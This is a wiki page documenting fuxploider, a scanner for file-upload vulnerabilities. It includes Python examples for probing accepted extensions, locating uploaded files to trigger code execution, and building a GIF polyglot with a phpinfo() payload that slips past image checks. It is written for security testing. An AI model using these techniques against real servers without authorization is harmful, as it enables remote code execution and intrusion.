Virgile Jarry edited this page Sep 17, 2018 · 10 revisions

Usage

usage: fuxploider.py [-h] [-d postData] [--proxy proxyUrl]
                 [--proxy-creds [credentials]] [-f integer]
                 [--cookies omnomnom] [--uploads-path path]
                 [-t templateName] [-r regex] -u target
                 [--not-regex regex] [--true-regex regex]
                 [-l listOfExtensions | -n n] [-v | -vv | -vvv] [-s] [-y]
                 [-T Threads] [-U useragent | --random-user-agent] [-m]
                 [--input-name image] [--form-action upload.php]

optional arguments:
  -h, --help            show this help message and exit
  -d postData, --data postData
                    Additional data to be transmitted via POST method. Example : -d "key1=value1&key2=value2"
  --proxy proxyUrl      Proxy information. Example : --proxy "user:password@proxy.host:8080"
  --proxy-creds [credentials]
                    Prompt for proxy credentials at runtime. Format : 'user:pass'
  -f integer, --filesize integer
                    File size to use for files to be created and uploaded (in kB).
  --cookies omnomnom    Cookies to use with HTTP requests. Example : PHPSESSID=aef45aef45afeaef45aef45&JSESSID=AQSEJHQSQSG
  --uploads-path path   Path on the remote server where uploads are put. Example : '/tmp/uploads/'
  -t templateName, --template templateName
                    Malicious payload to use for code execution detection. Default is to use every known template. For a complete list of templates, see the TEMPLATE section.
  -r regex, --regex-override regex
                    Specify a regular expression to detect code execution. Overrides the default code execution detection regex defined in the template in use.
  -l listOfExtensions, --legit-extensions listOfExtensions
                    Legit extensions expected, for a normal use of the form, comma separated. Example : 'jpg,png,bmp'
  -n n                  Number of common extensions to use. Example : -n 100
  -v                    Verbose mode
  -vv                   Very verbose mode
  -vvv                  Much verbose, very log, wow.
  -s, --skip-recon      Skip recon phase, where fuxploider tries to determine what extensions are expected and filtered by the server. Needs -l switch.
  -y                    Force detection of every entry point. Will not stop at first code exec found.
  -T Threads, --threads Threads
                    Number of parallel tasks (threads).
  -U useragent, --user-agent useragent
                    User-agent to use while requesting the target.
  --random-user-agent   Use a random user-agent while requesting the target.

Required named arguments:
  -u target, --url target
                    Web page URL containing the file upload form to be tested. Example : http://test.com/index.html?action=upload
  --not-regex regex     Regex matching an upload failure
  --true-regex regex    Regex matching an upload success

Manual Form Detection arguments:
  -m, --manual-form-detection
                    Disable automatic form detection. Useful when automatic detection fails due to: (1) Form loaded using Javascript (2) Multiple file upload forms in URL.
  --input-name image    Name of input for file. Example: <input type="file" name="image">
  --form-action upload.php
                    Path of form action. Example: <form method="POST" action="upload.php">

[TEMPLATES]
Templates are malicious payloads meant to be uploaded to the scanned remote server. Code execution detection is done based on the expected output of the payload.
Default templates are the following (name - description) : 
  * 'phpinfo' - Basic php file (plain text) with simple call to phpinfo().
  * 'nastygif' - Valid GIF file with a basic call to phpinfo() in the comments section of the file
  * 'nastyjpg' - Valid JPG file with a basic call to phpinfo() in the comments section of the file
  * 'basicjsp' - Basic jsp file with simple mathematical expression.

Output verbosity

Options : -v -vv -vvv

These options set the verbosity level. There are four levels; the default is 0, where info, warning, error and critical messages are displayed, along with a Python traceback if any.

  • 0 : Shows info messages, displaying information on successful exploitation of vulnerabilities.
  • 1 : Shows debug messages, displaying what fuxploider attempted in order to exploit vulnerabilities, even if it failed
  • 2 : Displays HTTP response headers for each HTTP request sent by fuxploider
  • 3 : Also displays HTTP response text/content from the tested server, along with headers

Target manipulation

Options : -u --not-regex --true-regex -s -l -r --uploads-path --cookies -f -d

Target specification takes --url (mandatory) plus --not-regex and/or --true-regex : at least one of the two detection regexes must be given, and both can be used together.

Target specification

Option : -u, --url

The provided url is expected to be the page displaying the file upload form, not the final destination (the action) of the form itself.

Example : fuxploider --url http://127.0.0.1/dvfu/vulnerabilities/fu4.php --not-regex "Sorry"

The provided url contains a file upload form, displayed for the users to send files. The action field of the form can be anything, fuxploider will try to detect it and use it without having to specify it. In some cases, fuxploider will not be able to detect the upload form (the form may be loaded dynamically via javascript, there may be several upload forms or several file inputs in the same form). In these cases, you can override the detection mechanism of fuxploider, using the manual form detection options.

Manual form detection

Options : -m, --manual-form-detection, --input-name, --form-action

-m, --manual-form-detection : Used to disable automatic form detection and to enable manual detection.

--input-name name : The value of the "name" attribute of the chosen file input to use. Example : For the following input : <input type="file" name="uploadedfile" />, you will use --input-name "uploadedfile".

--form-action action : The value of the "action" attribute of the chosen form to use. Example: For the following form : <form method="POST" action="upload.php">, you will use --form-action "upload.php"
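Added example (not fuxploider's own detection code): a small Python form finder that does what automatic detection has to do. It locates the form holding an <input type="file">, resolves the form action against the page URL, and refuses to guess when there are several candidates, which is exactly the situation the -m options exist for. The sample page is constructed for the example.

```python
"""Find the file upload form on a page; added example, not fuxploider's code."""
from html.parser import HTMLParser
from urllib.parse import urljoin

# Constructed sample page: a login form (no file input) and one upload form.
SAMPLE_HTML = """
<html><body>
<form method="POST" action="login.php">
  <input type="text" name="user"><input type="password" name="pass">
</form>
<form method="POST" action="upload.php" enctype="multipart/form-data">
  <input type="text" name="email">
  <input type="file" name="uploadedfile">
  <input type="submit" value="Send">
</form>
</body></html>
"""


class UploadFormFinder(HTMLParser):
    """Collects every <form> that contains at least one <input type="file">."""

    def __init__(self):
        super().__init__()
        self.forms = []       # finished forms holding a file input
        self._current = None  # form being parsed right now

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": a.get("action") or "",
                             "method": (a.get("method") or "GET").upper(),
                             "file_inputs": [], "fields": {}}
        elif tag == "input" and self._current is not None:
            kind = (a.get("type") or "text").lower()
            name = a.get("name")
            if kind == "file":
                self._current["file_inputs"].append(name)
            elif name and kind not in ("submit", "button", "reset"):
                # other fields travel with the upload, like the --data parameters
                self._current["fields"][name] = a.get("value") or ""

    def handle_endtag(self, tag):
        if tag == "form" and self._current is not None:
            if self._current["file_inputs"]:
                self.forms.append(self._current)
            self._current = None


def find_upload_form(page_url, html):
    """Return (action_url, file_input_name, other_fields) for the single
    upload form on the page. Raises ValueError when detection is ambiguous,
    i.e. when -m with --input-name/--form-action would be needed."""
    parser = UploadFormFinder()
    parser.feed(html)
    parser.close()
    if not parser.forms:
        raise ValueError("no upload form found (maybe built by JavaScript)")
    if len(parser.forms) > 1 or len(parser.forms[0]["file_inputs"]) > 1:
        raise ValueError("several upload forms/file inputs: use manual form detection")
    form = parser.forms[0]
    # A relative action is resolved against the page that served the form,
    # which is why -u must point at that page and not at the action itself.
    return urljoin(page_url, form["action"]), form["file_inputs"][0], form["fields"]


if __name__ == "__main__":
    print(find_upload_form("http://127.0.0.1/dvfu/vulnerabilities/fu4.php", SAMPLE_HTML))
```

Note that a form injected by JavaScript after page load never reaches this parser at all, so the first ValueError is what you get for such pages; the fix is the same as for the ambiguous case, pass -m with --input-name and --form-action.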

Valid extensions detection

Options : -n,-l,-s

Prior to any malicious file upload, fuxploider detects which extensions the file upload form accepts, by sending randomly generated, fixed-size files with each candidate extension.

-n argument : The number of requests needed to detect the accepted extensions can be significant. By default, the 100 most common extensions are tested. To test only the n most common extensions, use the -n switch :

fuxploider --url http://anurl.domain/upload.php --not-regex "error" -n 50

In the previous example, only the 50 most common extensions will be tried.

-l argument : Fuxploider is also able to manage extensions provided at command line. To do this, the -l switch must be used :

fuxploider --url http://anurl.domain/upload.php --not-regex "error" -l "gif,jpeg,png,bmp"

In the previous example, fuxploider does not use the default list of common extensions and uses the ones provided on the command line instead : gif, jpeg, png and bmp. These extensions are still tested against the server. Extensions passed with -l must be known to fuxploider (so that it can infer the associated MIME type); an unknown extension triggers a warning and is not used.

-s switch : If you want to skip the detection of what kind of file the server expects entirely (for example because you already know), use the -s switch together with the -l argument. Given the list of extensions supposed to be accepted, fuxploider uploads the payloads without checking that those extensions are really accepted by the server.
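An added Python sketch (not the project's code) of the recon phase described above: pick the extensions (the -l list, or the n most common), build one random fixed-size probe file per extension with the MIME type inferred from it, report extensions whose type cannot be inferred instead of uploading them, and keep the extensions whose upload response does not match the not regex. COMMON_EXTENSIONS and fake_server are constructed stand-ins; the real common-extension list is not reproduced on this page.

```python
"""Extension recon probes; added example, not fuxploider's code."""
import mimetypes
import os
import re

# Constructed stand-in for the tool's "common extensions" list, most
# common first (the real list is not reproduced on this page).
COMMON_EXTENSIONS = ["jpg", "jpeg", "png", "gif", "bmp", "pdf", "txt",
                     "zip", "html", "svg", "php", "phtml"]


def select_extensions(legit=None, n=None):
    """-l gives an explicit comma-separated list; otherwise the n most common."""
    if legit:
        return [e.strip().lstrip(".").lower() for e in legit.split(",") if e.strip()]
    return COMMON_EXTENSIONS[:n] if n else list(COMMON_EXTENSIONS)


def build_probe_files(extensions, size_kb=1, basename="fuxprobe"):
    """Return ([(filename, mime_type, content)], unknown_extensions).
    Content is random so no content-based filter can match it, and its
    size is the -f/--filesize value in kB. Extensions with no inferable
    MIME type are reported back instead of being uploaded."""
    probes, unknown = [], []
    for ext in extensions:
        mime, _ = mimetypes.guess_type(f"probe.{ext}")
        if mime is None:
            unknown.append(ext)
            continue
        probes.append((f"{basename}.{ext}", mime, os.urandom(size_kb * 1024)))
    return probes, unknown


def recon(probes, upload, not_regex):
    """Upload every probe and keep the extensions whose response does not
    match the failure regex. This is the loop that -s skips."""
    failure = re.compile(not_regex)
    accepted = []
    for filename, mime, content in probes:
        body = upload(filename, mime, content)
        if not failure.search(body):
            accepted.append(filename.rsplit(".", 1)[1])
    return accepted


def fake_server(filename, mime, content):
    """Constructed target: accepts .gif and .png only, rejects everything else."""
    ext = filename.rsplit(".", 1)[1]
    if ext in ("gif", "png"):
        return f"<p>Saved {filename} ({len(content)} bytes)</p>"
    return "<p>error: file type not allowed</p>"


if __name__ == "__main__":
    probes, unknown = build_probe_files(select_extensions(legit="gif,jpeg,png,bmp,zzz9"), size_kb=2)
    print("unknown extensions skipped:", unknown)
    print("accepted by server:", recon(probes, fake_server, "error"))
```

One request per extension is the cost of this phase, which is why -n and -l are worth setting on a slow or rate-limited target rather than burning 100 uploads by default.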

Successful uploads detection

Option : --true-regex, --not-regex

The true regex is meant to match a file upload success, while the not regex is expected to match a file upload failure. Either can be any valid regular expression as defined by the standard re module of Python 3.

The main thing to consider when choosing between a true regex and a not regex is whether code execution detection is wanted afterwards. If only the not regex is specified and no --uploads-path is given, code execution detection is not possible : fuxploider knows the upload succeeded but not where the file went. With the true regex, code execution detection is possible because the regex can capture the location of the uploaded file.

The goal is a regex matching the url to request in order to trigger code execution. For example, if the server responds with a link, even a partial/relative one, the true regex can match it so that fuxploider requests it automatically. The response is then parsed to detect code execution depending on the template in use (more information in the templates section). The part of the matched text to use in the code execution triggering HTTP request must be put in the first capturing group of the true regex.

Trigger code execution

Option : --true-regex, --uploads-path

When an upload looks successful according to the not/true regex argument, fuxploider can try to trigger code execution to confirm a valid entry point into the system. To do this, fuxploider needs to know where the uploaded file is on the server.

There are two ways to tell fuxploider where the uploaded files are put.

Uploads are put in a directly accessible directory

The easy way : when the server stores the file directly in a folder reachable through GET requests, use the --uploads-path switch with the URL path of the uploads folder (from the web root) :

--uploads-path /dvfu/vulnerabilities/uploads/

If the file malicious.gif seems successfully uploaded, fuxploider will then attempt to access http://127.0.0.1/dvfu/vulnerabilities/uploads/malicious.gif and parse the response to detect code execution.

Uploads are not directly accessible

The other way : when the server renames the files or puts them in a dynamically named (not guessable) directory, fuxploider can still use what the true regex matched in the next request to trigger code execution.

Let's say the server puts the uploaded files in a randomly named folder. To access the file, the response has to contain its path. Use it in the true regex !

fuxploider --url http://127.0.0.1/dvfu/vulnerabilities/fu4.php --true-regex "\<a href=\'(.+?)\'\>File uploaded\<\/a\>"

In the previous example, the capturing group captures the url returned by the server to access the uploaded file. Fuxploider can use this url to trigger code execution (or at least to try). When the true regex option is used without --uploads-path (you cannot reach the uploads folder directly but must match an url on the returned page), fuxploider asks whether you want to add a prefix or a suffix to the matched text.

[*] starting at 10:10:42
No uploads path provided, code detection can still be done using true regex capturing group.
Do you want to use the True Regex for code execution detection ? [Y/n] Y
Preffix capturing group of the true regex with : http://127.0.0.1/dvfu/vulnerabilities/
Suffix capturing group of the true regex with :

This way, if the link to the upload is only a relative path, you can still add the static part of it, before and/or after the dynamically matched path.
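To make the regex and capturing-group mechanics concrete, here is an added Python example (not fuxploider's code) that classifies an upload response with the two regexes, derives the URL to request either from --uploads-path or from the first capturing group wrapped in the prompted prefix/suffix, and checks the fetched page against a template detection regex. The sample responses are constructed; the PHPINFO_RE pattern is this example's own assumption and not the regex the phpinfo template actually ships with; checking the not regex before the true regex is also this example's choice. The demo includes the failure mode where the server echoes the PHP source back unexecuted, which a detection regex must not count as success.

```python
"""Upload success detection and code-execution triggering; added example,
not fuxploider's code."""
import re
from urllib.parse import urljoin


def classify_upload(body, true_regex=None, not_regex=None):
    """Return (status, captured): status is "failure", "success" or "unknown".
    The failure regex is checked first (this example's choice), then the
    success regex, whose first capturing group is returned when present."""
    if not true_regex and not not_regex:
        raise ValueError("at least one of --true-regex / --not-regex is required")
    if not_regex and re.search(not_regex, body):
        return "failure", None
    if true_regex:
        m = re.search(true_regex, body)
        if m is None:
            return "unknown", None
        return "success", (m.group(1) if m.groups() else None)
    return "success", None  # only --not-regex given and it did not match


def exec_url(page_url, filename, uploads_path=None, captured=None, prefix="", suffix=""):
    """Where to request the uploaded file: --uploads-path joined with the
    filename, or the true regex capture wrapped in the prompted prefix/suffix.
    None means the file cannot be located, so code execution cannot be tested."""
    if uploads_path:
        return urljoin(page_url, uploads_path.rstrip("/") + "/" + filename)
    if captured is None:
        return None
    return prefix + captured + suffix


# Assumed detection regex for the phpinfo-based templates: phpinfo() output
# shows a "PHP Version x.y" heading. Not necessarily the tool's own regex;
# -r/--regex-override is the switch for supplying yours.
PHPINFO_RE = r"PHP Version \d+\.\d+"


def code_executed(body, detect_regex=PHPINFO_RE):
    """True only if the fetched page shows the payload's output, not its source."""
    return re.search(detect_regex, body) is not None


# Constructed sample data: the true regex from this page and two server replies.
PAGE_URL = "http://127.0.0.1/dvfu/vulnerabilities/fu4.php"
TRUE_REGEX = r"\<a href=\'(.+?)\'\>File uploaded\<\/a\>"
RESPONSE_OK = "<p>Done.</p><a href='uploads/3f9c1b/nasty.php'>File uploaded</a>"
RESPONSE_KO = "<p>Sorry, only images are allowed.</p>"


def demo():
    """Walk a successful upload through to code-execution detection."""
    status, captured = classify_upload(RESPONSE_OK, TRUE_REGEX, "Sorry")
    url = exec_url(PAGE_URL, "nasty.php", captured=captured,
                   prefix="http://127.0.0.1/dvfu/vulnerabilities/")
    # Constructed replies to GET url: executed payload vs. source echoed back.
    executed = code_executed("<h1>PHP Version 7.2.9</h1><table>...</table>")
    not_executed = code_executed("<?php phpinfo(); ?>")
    return status, url, executed, not_executed


if __name__ == "__main__":
    print(demo())
```

The prefix value is the one typed at the "Preffix capturing group" prompt shown above; with a capture that is already an absolute URL, leave both prefix and suffix empty.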


Proxy specification

Options --proxy, --proxy-creds

Fuxploider relies on the default proxy handling of the Requests library. If a proxy must be used, specify its url with the --proxy argument.

fuxploider --url http://anurl.domain/upload.php --not-regex "error" --proxy http://muchproxy.host:3128

If credentials are needed to access the proxy, use the --proxy-creds switch, either with the credentials on the command line or alone. Credentials given on the command line are used as is; otherwise you are prompted for them at runtime. The prompt is the safer choice : a password passed as an argument ends up in the shell history and is visible to other users in the process list.

fuxploider --url http://anurl.domain/upload.php --not-regex "error" --proxy http://muchproxy.host:3128    \
    --proxy-creds "user:pass"
[*] Starting at 10:10:42
...

--proxy http://muchproxy.host:3128 --proxy-creds
Proxy username : almandin
Proxy password : 
[*] starting at 10:10:42
...

Server specific additional information

POST data

Option : --data

Many file upload forms ask for additional information while uploading the file (an email, a name or anything). You can provide such additional information using the --data argument :

fuxploider --url http://anurl.domain/upload.php --not-regex "error" --data 'email=test@ab.com&name=almandin'

These POST parameters are sent with every upload request.

Cookies

Option : --cookies

Cookies can be provided using the --cookies argument, to specify a session id or anything else :

fuxploider --url http://anurl.domain/upload.php --not-regex "error"     \
    --cookies 'PHPSESSID=9a26a89f8c881afbd7638c62c39e5610'

File size

Option : --filesize

When a form requires a minimum file size, the --filesize option sets the size of the files used when detecting accepted extensions. The expected integer is in kB.

fuxploider --url http://anurl.domain/upload.php --not-regex "error" --filesize 250

When used while skipping valid extensions detection (-s switch), -f/--filesize switch has no effect.


Templates/Payloads

Options -t, -r

Several payloads are defined in fuxploider to allow detection of code execution through different techniques (for instance, a basic php file is present, along with a gif and a jpeg template to detect code execution while bypassing getimagesize checks).

-t argument : The -t argument selects one particular payload. Otherwise, every template is used.

fuxploider --url http://anurl.domain/upload.php --not-regex "error" --template phpinfo

In the previous example, only the template named phpinfo is used. As this payload is a plain text file, it will not get past getimagesize-like checks.

-r argument : The -r argument overrides the way fuxploider detects code execution on successful uploads. By default, each template/payload has its own regular expression to detect whether code execution happened; -r replaces it. For instance, the phpinfo template uses a regex matching the output of a basic phpinfo() call.
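As an added illustration (not fuxploider's own template code), the following Python builds a file of the 'nastygif' kind : a structurally valid 1x1 GIF89a whose comment extension carries a phpinfo() call, then walks the block structure back to show that the payload sits inside a well-formed image. The bytes and helper names are this example's own. Passing getimagesize() only gets the file past the content check; the payload still runs only if the server executes the uploaded file as PHP (an accepted .php-style extension, a double extension the server honours, or a handler misconfiguration), which is what the extension recon and the code execution trigger are there to find out.

```python
"""Build and inspect a 'nastygif'-style polyglot; added example, not the
project's template."""


def _sub_blocks(data: bytes) -> bytes:
    """GIF extension payloads are length-prefixed blocks of at most 255
    bytes, terminated by a zero-length block."""
    out = bytearray()
    for i in range(0, len(data), 255):
        chunk = data[i:i + 255]
        out.append(len(chunk))
        out.extend(chunk)
    out.append(0)
    return bytes(out)


def make_nasty_gif(payload: bytes = b"<?php phpinfo(); ?>") -> bytes:
    """Minimal 1x1 GIF89a with the payload in a comment extension (0x21 0xFE)."""
    header = b"GIF89a"
    # logical screen: width 1, height 1, global colour table with 2 entries,
    # background index 0, pixel aspect ratio 0
    screen = b"\x01\x00\x01\x00\x80\x00\x00"
    palette = b"\x00\x00\x00\xff\xff\xff"              # black, white
    comment = b"\x21\xfe" + _sub_blocks(payload)       # comment extension
    image = b"\x2c\x00\x00\x00\x00\x01\x00\x01\x00\x00"  # image descriptor, no local table
    pixels = b"\x02\x02\x44\x01\x00"                    # LZW min code 2: clear, index 0, EOI
    return header + screen + palette + comment + image + pixels + b"\x3b"


def gif_comments(data: bytes):
    """Walk the GIF block structure and return every comment found.
    Raises ValueError if the structure is not what a decoder expects,
    so a successful walk is a cheap well-formedness check."""
    if data[:6] not in (b"GIF87a", b"GIF89a"):
        raise ValueError("not a GIF")
    packed = data[10]
    pos = 13
    if packed & 0x80:                                   # skip global colour table
        pos += 3 * (2 << (packed & 0x07))
    comments = []
    while pos < len(data):
        block = data[pos]
        if block == 0x3b:                               # trailer
            return comments
        if block == 0x21:                               # extension
            label = data[pos + 1]
            pos += 2
            body = bytearray()
            while data[pos]:
                n = data[pos]
                body += data[pos + 1:pos + 1 + n]
                pos += 1 + n
            pos += 1
            if label == 0xfe:
                comments.append(bytes(body))
        elif block == 0x2c:                             # image descriptor
            pos += 10
            if data[pos - 1] & 0x80:                    # local colour table
                pos += 3 * (2 << (data[pos - 1] & 0x07))
            pos += 1                                    # LZW minimum code size
            while data[pos]:
                pos += 1 + data[pos]
            pos += 1
        else:
            raise ValueError(f"unexpected block 0x{block:02x} at offset {pos}")
    raise ValueError("missing trailer")


if __name__ == "__main__":
    gif = make_nasty_gif()
    print(len(gif), "bytes, comments:", gif_comments(gif))
```

Payloads longer than 255 bytes are split across several sub-blocks, which is why the parser reassembles them; PHP, on the other hand, does not care about GIF framing at all and simply scans the file for the opening tag, so the split does not break execution.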


Miscellaneous

-T argument : Specifies the number of threads to use for parallel HTTP requests.

-U argument : Used to specify a user-agent. Example : -U "myAwesomeUser-Agent"

--random-user-agent : Use a random user-agent (picked from a plain text list). The same random user-agent is then used for every request.
